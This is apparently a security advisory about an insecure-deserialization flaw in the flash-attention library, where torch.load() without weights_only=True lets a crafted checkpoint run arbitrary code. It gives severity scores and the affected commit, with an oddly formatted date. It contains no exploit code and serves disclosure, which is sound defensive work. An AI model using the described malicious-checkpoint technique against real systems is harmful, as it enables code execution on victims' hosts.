Impact
The flash‑attention framework contains an insecure deserialization flaw in its checkpoint loading mechanism. The load_checkpoint() function and the checkpoint logic in eval.py use torch.load() without the security‑restrictive weights_only=True setting, allowing the deserialization of arbitrary Python objects via the pickle module. An attacker can craft a malicious checkpoint file; when a victim loads this file during model warm‑starting or evaluation, arbitrary Python code runs on the victim’s system. This flaw satisfies CWE‑502 and CWE‑94, giving an attacker full control over the executing environment and compromising confidentiality, integrity, and availability of the host.
Affected Systems
The vulnerability manifests in the flash‑attention library maintained by Dao‑AILab, specifically at the commit e724e2588cbe754beb97cf7c011b5e7e34119e62 (2025‑13‑04). All usages of load_checkpoint() or the eval.py checkpoint loader in this version are affected. No vendor‑specific product name is listed because flash‑attention is an open‑source training framework; consumers must audit the exact commit or release they deploy.
Risk and Exploitability
The vulnerability permits arbitrary code execution when loading an untrusted checkpoint file; it requires local access to the checkpoint but does not depend on a network attack vector. The EPSS score is < 1%, indicating a low but non‑zero likelihood of exploitation, and the issue is not listed in CISA KEV. The CVSS score of 7.3 classifies it as high severity. An attacker who can supply or influence the checkpoint file can run arbitrary code with the permissions of the process executing flash‑attention. The lack of a published official patch or solution further increases the urgency for mitigation.
OpenCVE Enrichment